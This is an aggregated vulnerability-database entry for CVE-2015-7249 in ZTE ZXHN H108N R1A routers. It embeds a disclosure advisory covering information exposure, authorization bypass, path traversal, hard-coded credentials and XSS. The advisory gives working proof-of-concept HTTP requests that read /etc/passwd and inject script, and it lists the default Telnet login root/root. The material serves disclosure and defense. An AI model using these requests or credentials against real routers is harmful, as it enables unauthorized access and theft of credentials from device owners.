ID

VAR-201512-0229


CVE

CVE-2015-7249


TITLE

ZTE ZXHN H108N R1A routers contain multiple vulnerabilities

Trust: 0.8

sources: CERT/CC: VU#391604

DESCRIPTION

ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allow remote authenticated users to bypass intended access restrictions via a modified request, as demonstrated by leveraging the support account to change a password via a cgi-bin/webproc accountpsd action. ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. ZTE ZXHN H108N R1A A vulnerability exists in the device that prevents access restrictions. ZTE ZXHN H108N R1A is a wireless router product of China ZTE Corporation. ZTE ZXHN H108N R1A ZTE.bhs.ZXHNH108NR1A.h_PE has a security vulnerability that allows a remote attacker to authenticate with an existing account by operating the parameters in the client-side request and perform unauthorized operations. ZTE ZXHN H108N R1A routers are prone to the following security vulnerabilities: 1. Multiple information-disclosure vulnerabilities 2. An authorization-bypass vulnerability 3. A directory-traversal vulnerability 4. A hard-coded credentials vulnerability 5. A cross-site scripting vulnerability Attackers can exploit these issues to gain access to the browser of an unsuspecting user and execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, gain access to sensitive information, read arbitrary files, or bypass security restrictions and perform unauthorized actions. This may aid in further attacks. *CVE-ID*: CVE-2015-7248 CVE-2015-7249 CVE-2015-7250 CVE-2015-7251 CVE-2015-7252 *Note*: Large deployment size, primarily in Peru, used by TdP. Description *CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information Exposure* - CVE-2015-7248 Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A. A. User names and password hashes can be viewed in the page source of http://<IP>/cgi-bin/webproc PoC: Login Page source contents: ...snip.... //get user info var G_UserInfo = new Array(); var m = 0; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "admin"; //UserName G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here G_UserInfo[m][2] = "1"; //Level G_UserInfo[m][3] = "1"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "user"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "2"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "support"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "3"; //Index m++; ...snip... B. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE. *CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper Authorization* - CVE-2015-7249 By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. PoC 1: 1. Login page user drop-down option shows only admin only. 2. Use an intercepting proxy / Tamper Data - and intercept the Login submit request. 3. Change the username admin to user / support and continue Login. 4. Application permits other users to log in to mgmt portal. PoC 2: After logging in as support, some functional options are visibly restricted. Certain actions can still be performed by calling the url directly. Application does not perform proper AuthZ checks. Following poc is a change password link. It is accessible directly, though it (correctly) is restricted to changing normal user (non-admin) password only. http:// <IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd Other functions / pages may also be accessible to non-privileged users. *CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') *- CVE-2015-7250 The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter which takes an unrestricted file path as input, allowing an attacker to read arbitrary files on the system. Arbitrary files can be read off of the device. No authentication is required to exploit this vulnerability. PoC HTTP POST request POST /cgi­bin/webproc HTTP/1.1 Host: IP User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept­Language: en­US,en;q=0.5 Accept­Encoding: gzip, deflate Referer: https://IP/cgi­bin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keep­alive Content­Type: application/x­www­form­urlencoded Content­Length: 177 getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj­ action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a HTTP Response HTTP/1.0 200 OK Content­type: text/html Pragma: no­cache Cache­Control: no­cache set­cookie: sessionid=7ce7bd4a; expires=Fri, 31­Dec­9999 23:59:59 GMT;path=/ #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh *CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of Hard-coded Credentials* - CVE-2015-7251 In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password. *CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') *- CVE-2015-7252 In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is vulnerable to reflected cross-site scripting [pre-authentication]. PoC POST /cgi­bin/webproc HTTP/1.1 Host: IP User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept­Language: en­US,en;q=0.5 Accept­Encoding: gzip, deflate Referer: https://IP/cgi­bin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keep­alive Content­Type: application/x­www­form­urlencoded Content­Length: 177 getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj­ action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a +++++ -- Best Regards, Karn Ganeshen

Trust: 3.42

sources: NVD: CVE-2015-7249 // CERT/CC: VU#391604 // JVNDB: JVNDB-2015-006588 // CNVD: CNVD-2015-07624 // BID: 77421 // VULHUB: VHN-85210 // VULMON: CVE-2015-7249 // PACKETSTORM: 134492

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2015-07624

AFFECTED PRODUCTS

vendor:ztemodel:zxhn h108n r1ascope:lteversion:zte.bhs.zxhnh108nr1a.h_pe

Trust: 1.0

vendor:ztemodel: - scope: - version: -

Trust: 0.8

vendor:ztemodel:zxhn h108n r1ascope: - version: -

Trust: 0.8

vendor:ztemodel:zxhn h108n r1ascope:ltversion:zte.bhs.zxhnh108nr1a.k_pe

Trust: 0.8

vendor:ztemodel:zxhn h108n r1a zte.bhs.zxhnh108nr1a.h pescope: - version: -

Trust: 0.6

vendor:ztemodel:zxhn h108n r1ascope:eqversion:zte.bhs.zxhnh108nr1a.h_pe

Trust: 0.6

vendor:ztemodel:zxv10 w300 w300v1.0.0f er1 pescope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h108n r1a zte.bhs.zxhnh108nr1ascope: - version: -

Trust: 0.3

vendor:ztemodel:zxhn h108n r1a zte.bhs.zxhnh108nr1ascope:neversion: -

Trust: 0.3

sources: CERT/CC: VU#391604 // CNVD: CNVD-2015-07624 // BID: 77421 // JVNDB: JVNDB-2015-006588 // CNNVD: CNNVD-201511-237 // NVD: CVE-2015-7249

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-7249
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-7249
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2015-07624
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201511-237
value: MEDIUM

Trust: 0.6

VULHUB: VHN-85210
value: MEDIUM

Trust: 0.1

VULMON: CVE-2015-7249
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-7249
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:L/AU:S/C:N/I:C/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: COMPLETE
availabilityImpact: NONE
exploitabilityScore: 8.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2015-07624
severity: HIGH
baseScore: 8.3
vectorString: AV:A/AC:L/AU:N/C:C/I:C/A:C
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 6.5
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-85210
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:L/AU:S/C:N/I:C/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: COMPLETE
availabilityImpact: NONE
exploitabilityScore: 8.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2015-7249
baseSeverity: MEDIUM
baseScore: 4.9
vectorString: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: 1.2
impactScore: 3.6
version: 3.0

Trust: 1.0

sources: CNVD: CNVD-2015-07624 // VULHUB: VHN-85210 // VULMON: CVE-2015-7249 // JVNDB: JVNDB-2015-006588 // CNNVD: CNNVD-201511-237 // NVD: CVE-2015-7249

PROBLEMTYPE DATA

problemtype:CWE-264

Trust: 1.9

problemtype:CWE-Other

Trust: 0.8

sources: VULHUB: VHN-85210 // JVNDB: JVNDB-2015-006588 // NVD: CVE-2015-7249

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201511-237

TYPE

permissions and access control

Trust: 0.6

sources: CNNVD: CNNVD-201511-237

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-006588

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-85210 // VULMON: CVE-2015-7249

PATCH

title:Top Pageurl:http://www.zte.co.jp/

Trust: 0.8

title:ZTE ZXHN H108N R1A Permissions Bypass Vulnerability Patchurl:https://www.cnvd.org.cn/patchInfo/show/66792

Trust: 0.6

title:ZTE ZXHN H108N R1A Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=58730

Trust: 0.6

sources: CNVD: CNVD-2015-07624 // JVNDB: JVNDB-2015-006588 // CNNVD: CNNVD-201511-237

EXTERNAL IDS

db:CERT/CCid:VU#391604

Trust: 4.3

db:NVDid:CVE-2015-7249

Trust: 3.6

db:BIDid:77421

Trust: 1.5

db:EXPLOIT-DBid:38773

Trust: 1.2

db:JVNid:JVNVU91514956

Trust: 0.8

db:JVNDBid:JVNDB-2015-006588

Trust: 0.8

db:CNNVDid:CNNVD-201511-237

Trust: 0.7

db:CNVDid:CNVD-2015-07624

Trust: 0.6

db:PACKETSTORMid:134492

Trust: 0.2

db:SEEBUGid:SSVID-89798

Trust: 0.1

db:VULHUBid:VHN-85210

Trust: 0.1

db:VULMONid:CVE-2015-7249

Trust: 0.1

sources: CERT/CC: VU#391604 // CNVD: CNVD-2015-07624 // VULHUB: VHN-85210 // VULMON: CVE-2015-7249 // BID: 77421 // JVNDB: JVNDB-2015-006588 // PACKETSTORM: 134492 // CNNVD: CNNVD-201511-237 // NVD: CVE-2015-7249

REFERENCES

url:https://www.kb.cert.org/vuls/id/391604

Trust: 3.6

url:https://www.kb.cert.org/vuls/id/bluu-9zdjwa

Trust: 2.6

url:https://www.exploit-db.com/exploits/38773/

Trust: 1.3

url:http://www.securityfocus.com/bid/77421

Trust: 1.2

url:https://cwe.mitre.org/data/definitions/200.html

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/285.html

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/288.html

Trust: 0.8

url:http://cwe.mitre.org/data/definitions/22.html

Trust: 0.8

url:http://cwe.mitre.org/data/definitions/798.html

Trust: 0.8

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7249

Trust: 0.8

url:http://jvn.jp/vu/jvnvu91514956/index.html

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-7249

Trust: 0.8

url:http://www.zte.com.cn/

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/264.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://packetstormsecurity.com/files/134492/zte-zxhn-h108n-r1a-zxv10-w300-traversal-disclosure-authorization.html

Trust: 0.1

url:https://cwe.mitre.org/data/definitions/200.html>*:

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-7250

Trust: 0.1

url:http://cwe.mitre.org/data/definitions/22.html>*:

Trust: 0.1

url:http://cwe.mitre.org/data/definitions/798.html>*:

Trust: 0.1

url:https://www.zte.com.cn]

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-7249

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-7252

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-7248

Trust: 0.1

url:http://<ip>/cgi-bin/webproc

Trust: 0.1

url:https://cwe.mitre.org/data/definitions/285.html>*:

Trust: 0.1

url:https://ip/cgi­bin/webproc

Trust: 0.1

url:https://cwe.mitre.org/data/definitions/79.html>*:

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-7251

Trust: 0.1

sources: CERT/CC: VU#391604 // CNVD: CNVD-2015-07624 // VULHUB: VHN-85210 // VULMON: CVE-2015-7249 // BID: 77421 // JVNDB: JVNDB-2015-006588 // PACKETSTORM: 134492 // CNNVD: CNNVD-201511-237 // NVD: CVE-2015-7249

CREDITS

Karn Ganeshen

Trust: 0.4

sources: BID: 77421 // PACKETSTORM: 134492

SOURCES

db:CERT/CCid:VU#391604
db:CNVDid:CNVD-2015-07624
db:VULHUBid:VHN-85210
db:VULMONid:CVE-2015-7249
db:BIDid:77421
db:JVNDBid:JVNDB-2015-006588
db:PACKETSTORMid:134492
db:CNNVDid:CNNVD-201511-237
db:NVDid:CVE-2015-7249

LAST UPDATE DATE

2024-11-23T21:43:34.252000+00:00


SOURCES UPDATE DATE

db:CERT/CCid:VU#391604date:2015-11-04T00:00:00
db:CNVDid:CNVD-2015-07624date:2015-11-17T00:00:00
db:VULHUBid:VHN-85210date:2017-09-13T00:00:00
db:VULMONid:CVE-2015-7249date:2017-09-13T00:00:00
db:BIDid:77421date:2016-02-02T20:05:00
db:JVNDBid:JVNDB-2015-006588date:2016-01-05T00:00:00
db:CNNVDid:CNNVD-201511-237date:2015-12-31T00:00:00
db:NVDid:CVE-2015-7249date:2024-11-21T02:36:26.050

SOURCES RELEASE DATE

db:CERT/CCid:VU#391604date:2015-11-03T00:00:00
db:CNVDid:CNVD-2015-07624date:2015-11-17T00:00:00
db:VULHUBid:VHN-85210date:2015-12-30T00:00:00
db:VULMONid:CVE-2015-7249date:2015-12-30T00:00:00
db:BIDid:77421date:2015-11-04T00:00:00
db:JVNDBid:JVNDB-2015-006588date:2016-01-05T00:00:00
db:PACKETSTORMid:134492date:2015-11-20T22:24:32
db:CNNVDid:CNNVD-201511-237date:2015-11-13T00:00:00
db:NVDid:CVE-2015-7249date:2015-12-30T05:59:02.333